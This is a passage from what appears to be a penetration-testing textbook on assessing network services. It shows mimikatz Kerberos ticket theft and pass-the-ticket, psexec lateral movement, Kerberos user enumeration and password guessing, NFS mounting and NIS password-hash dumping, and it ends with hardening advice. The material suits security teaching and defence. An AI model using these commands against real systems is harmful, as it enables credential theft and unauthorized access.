Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file   : 2-40a50000-uberuser@cifs~dc1.abc.org-ABC.ORG.kirbi

[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ;
                    11/2/2015 11:39:31 PM
Server Name       : ldap/dc1.abc.org @ ABC.ORG
Client Name       : uberuser @ ABC.ORG
Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file   : 3-40a50000-uberuser@ldap~dc1.abc.org-ABC.ORG.kirbi

[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ;
                    11/2/2015 11:39:31 PM
Server Name       : LDAP/dc1.abc.org/abc.org @ ABC.ORG
Client Name       : uberuser @ ABC.ORG
Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file   : 4-40a50000-uberuser@LDAP~dc1.abc.org~abc.org-ABC.ORG.kirbi

mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~ABC.ORG-ABC.ORG.kirbi
  0 - File '1-40e10000-uberuser@krbtgt~ABC.ORG-ABC.ORG.kirbi' : OK

mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.abc.org-ABC.ORG.kirbi
  0 - File '2-40a50000-uberuser@cifs~dc1.abc.org-ABC.ORG.kirbi' : OK

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ;
                    11/2/2015 11:39:31 PM
Server Name       : krbtgt/ABC.ORG @ ABC.ORG
Client Name       : uberuser @ ABC.ORG
Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ;
                    11/2/2015 11:39:31 PM
Server Name       : cifs/dc1.abc.org @ ABC.ORG
Client Name       : uberuser @ ABC.ORG
Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;

C:\Users\notanadmin> psexec \\dc1.abc.org cmd.exe

PsExec v1.97 - Execute processes remotely
Copyright (C) 2001-2009 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
abc\uberuser

root@kali:~# dig txt _kerberos.mit.edu +short
"ATHENA.MIT.EDU"
root@kali:~# dig txt _kerberos.megacz.com +short
"MEGACZ.COM"

root@kali:~# nmap -p88 --script krb5-enum-users --script-args \
krb5-enum-users.realm=research 172.16.102.11

Starting Nmap 6.47 (http://nmap.org) at 2015-10-10 04:15 UTC
Nmap scan report for 172.16.102.11
PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     administrator@research
|     chris@research
|     da_craigb@research
|     justauser@research
|_    mubix@research

C:\ebrute> ebrute.exe -r kerbenum -U users.txt -e research -h 172.16.102.11
ebrute v0.78 - Edward Torkington
Loading users...
Parsing users...
Password not specified (normal behavior for some plugins - lets do joey checks_
Added: 5 user(s), 1 password(s), 1 host(s), + joeycheck 7 tasks over 1 thread/s.
Starting: 10/10/2015 5:09:31 AM
[1]  HOST: '172.16.102.11' | USER: 'chris' | PASS: 'chris' |
     EXTRA: 'research' | Return code: 'Success' []
[1]  HOST: '172.16.102.11' | USER: 'justauser' | PASS: 'justauser' |
     EXTRA: 'research' | Return code: 'Success' []

VNC

The Olivetti & Oracle Research Lab published the remote framebuffer (RFB) protocol specification in 1998. Virtual Network Computing (VNC) is an application that uses the protocol to provide remote access to hosts. The lab closed in 2002, prompting the developers to incorporate RealVNC Ltd. and publish subsequent RFB protocol specifications.

RFB services commonly listen on TCP port 5900 but can use others (e.g., 4900 and 6000). The protocol is extensible via arbitrary encoding types, which support file transfer and compression within packages including UltraVNC and TightVNC. As soon as it’s connected, the server provides a protocol string, as demonstrated by Example 7-34. Common protocol versions include 000.000, 003.003, 003.007, 003.008, 003.889, 004.000, and 004.001.

root@kali:~# telnet 121.163.21.135 5900
Trying 121.163.21.135...
Connected to 121.163.21.135.
Escape character is '^]'.
RFB 004.000

Upon connecting and providing a version string to negotiate the connection, the server returns a security type value. Table 7-31 lists common types. The most common is VNC authentication, which is a DES challenge–response mechanism requiring only a password.

The Nmap vnc-info script performs testing of exposed VNC servers, revealing the RFB protocol version and supported security types, as shown in Example 7-35. At the time of writing, the VNC library within Nmap (vnc.lua) recognizes only protocol versions 3.3, 3.7, 3.8, and 3.889. As such, you must manually investigate servers reporting other versions.

root@kali:~# nmap -Pn -sSVC -p5900 128.32.147.121

Starting Nmap 6.46 (http://nmap.org) at 2014-12-09 13:05 UTC
Nmap scan report for 128.32.147.121
PORT     STATE SERVICE VERSION
5900/tcp open  vnc     Apple remote desktop vnc
| vnc-info:
|   Protocol version: 3.889
|   Security types:
|     Mac OS X security type (30)
|_    Mac OS X security type (35)

Unix RPC Services

A number of Unix daemons (e.g., NIS and NFS components) expose RPC services via dynamic high ports. To track registered endpoints and present clients with a list of available RPC services, a portmapper service listens on TCP and UDP port 111 (and port 32771 within Oracle Solaris). Example 7-36 demonstrates using Nmap to query these ports and provide details of running RPC services.

root@kali:~# nmap -sSUC -p111 192.168.10.1

Starting Nmap 6.46 (http://nmap.org) at 2014-11-14 10:25 UTC
Nmap scan report for 192.168.10.1
PORT    STATE SERVICE
111/tcp open  rpcbind
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100001  2,3,4      32787/udp  rstatd
|   100003  2,3         2049/tcp  nfs
|   100003  2,3         2049/udp  nfs
|   100004  1,2         1023/udp  ypserv
|   100004  1,2        32771/tcp  ypserv
|   100005  1,2,3      32811/udp  mountd
|   100005  1,2,3      32816/tcp  mountd
|   100007  1,2,3      32772/tcp  ypbind
|   100007  1,2,3      32779/udp  ypbind
|   100009  1           1022/udp  yppasswdd
|   100021  1,2,3,4     4045/tcp  nlockmgr
|   100021  1,2,3,4     4045/udp  nlockmgr
|   100024  1          32777/tcp  status
|   100024  1          32786/udp  status
|   100068  2,3,4,5    32792/udp  cmsd
|   100069  1          32773/tcp  ypxfrd
|   100069  1          32780/udp  ypxfrd
|   100083  1          32784/tcp  ttdbserverd
|   100133  1          32777/tcp  nsm_addrand
|   100133  1          32786/udp  nsm_addrand
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl

In this case, the following services are available:

• The RPC portmapper (rpcbind) on TCP and UDP port 111

• The rstatd daemon, providing kernel statistics via RPC

• NFS components (nfs, mountd, nlockmgr, status, nsm_addrand, and nfs_acl)

• NIS components (ypserv, ypbind, yppasswd, and ypxfrd)

• Common Desktop Environment (CDE) services:

  • Calendar manager service daemon (cmsd)

  • ToolTalk database server (ttdbserverd)

Within legacy environments, many of these services are vulnerable to remote attack. A comprehensive list of RPC program numbers, descriptions, and references is also maintained by IANA.⁵⁸

root@kali:~# apt-get install rstat-client
root@kali:~# rsysinfo 192.168.10.1
System Information for: potatohead.example.org
uptime:  33 days, 10:20, load average: 0.00 0.00 0.01
cpu usage (jiffies): user 326809  nice 124819  system 391189  idle 576845938
page in: 7914  page out: 26661   swap in: 0  swap out: 0
intr: 1501887323     context switches: 118484073
disks: 0 0 488270 4
ethernet:  rx: 36034723   rx-err: 0
           tx: 8387775    tx-err: 0    collisions: 0

root@kali:~# showmount -e l92.168.10.1
Export list for 192.168.10.1:
/export/home       192.168.10.0/24
root@kali:~# mount -o nolock 192.168.10.1:/export/home /tmp/home
root@kali:~# ls –la /tmp/home
total 0
drwxr-xr-x  3 root  root   60 Dec  9 00:40 .
drwxr-xr-x 30 root  root  240 Dec  9 06:25 ..
drwxr-xr-x  3  182 users   60 Mar 29 13:05 dave
drwxr-xr-x  3  199 users 2048 Jan  3 10:02 florent
drwxr-xr-x  3  332 users   60 Aug 14 00:40 james
drwxr-xr-x  3 2099   102 1024 Sep  1 02:25 katykat
drwxr-xr-x  3 root  root   60 Dec  9 00:40 root
drwxr-xr-x  3  218   101 1024 Sep  2 16:04 tiff
drwxr-xr-x  3 1377 users   60 Mar 29 15:18 yumi

root@kali:~# apt-get install nis
root@kali:~# ypwhich -d example.org 192.168.10.1
potatohead.example.org
root@kali:~# ypcat –d example.org –h 192.168.10.1 passwd.byname
tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash 
katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash 
james:i0na7pfgtxi42:332:100::/export/home/james:/bin/tcsh 
florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh 
dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash 
yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash

root@kali:~# apt-get install rusers
root@kali:~# rusers -l 192.168.10.1
Sending broadcast for rusersd protocol version 3...
Sending broadcast for rusersd protocol version 2...
tiff       potatohead:console         Sep  2 13:03   22:03
katykat    potatohead:ttyp5           Sep  1 09:35      14

Common Network Service Assessment Recap

Perform the following to uncover vulnerabilities in common network services:

Fingerprinting

Use Nmap version scanning (-sV) and manual techniques to review banner materials and fingerprint available services. Also consider cross-referencing the operating system release and configuration to deduce the version of certain implementations (e.g., OpenSSH 5 versus 6).

Enumeration of supported features

Use manual assessment techniques and Nmap scripts to list the supported features of a given service (e.g., DNS recursion or LDAP anonymous binding). Successful exploitation of some implementation flaws relies on support of particular features, and so investigation is important.

Identification and qualification of known weaknesses

Review the tables in this chapter, along with other sources (e.g., NVD), to identify known weaknesses within the exposed network services. These can include information leak flaws that provide useful data.

Brute-force password grinding

Use Hydra and other tools to perform brute-force password grinding against exposed services supporting authentication (including FTP, SSH, Telnet, SNMP, LDAP, and VNC). Tailor dictionary files to the type of system you are testing to reduce testing time and network traffic.

Investigation of materials obtained

FTP, TFTP, SNMP, LDAP, and Unix RPC services often yield useful materials that you can feed to further testing processes (e.g., usernames that can be used within a password grinding attack). Review and investigate available materials to ensure that you maximize their value.

Service Hardening and Countermeasures

Consider the following countermeasures when hardening network services:

• Reduce network attack surface wherever possible. For example, instead of offering file transfer via FTP, SFTP, and SCP, elect to use just SCP. Furthermore, reduce exposed logic and application attack surface within each network service by disabling support for unnecessary features.

• Maintain server software packages and libraries (e.g., NTP, BIND, and OpenSSL) to negate known weaknesses within the exposed attack surface that remains.

• Disable Telnet, FTP, SNMP, VNC, and other maintenance protocols that lack transport security through encryption. Remote maintenance operations should be offered through a secure authenticated connection (e.g., VPN or SSH), or via a closed management network.

• If you use SNMP, ensure that you use strong credentials. Consider using ACLs to limit SNMP access to trusted sources and prevent unauthorized TFTP file transfers to your devices.

• Understand the exposed authentication mechanisms across your services and ensure that auditing is configured so that brute-force password grinding attacks are highlighted.

• Harden SSH servers as follows:

  • Enforce version 2.0 of the protocol and disable backward compatibility to mitigate known weaknesses within SSH 1.0.

  • Prune supported key exchange mechanisms and ciphers⁵⁹ in-line with the server software you are running, and clients you need to support.

  • Mitigate brute-force password grinding issues by disabling password authentication for users, and enforcing one-time password (OTP), public key, or multifactor authentication for users via Google Authenticator, Duo Security, and other platforms.

• Harden DNS servers:

  • Disable support for recursive queries from untrusted sources.

  • Ensure that zone files do not contain superfluous or sensitive information.

• Harden Kerberos servers:

  • Disable support for weak HMAC algorithms (56-bit DES, 40-bit export grade RC4, and 128-bit RC4 in particular). Modern operating systems support AES128 and AES256, which should be enforced.

  • Within Microsoft environments, consider enforcing the highest domain functional level. Windows Server 2012 introduces a number of improvements, including Kerberos armoring, which mitigate downgrade attacks in particular.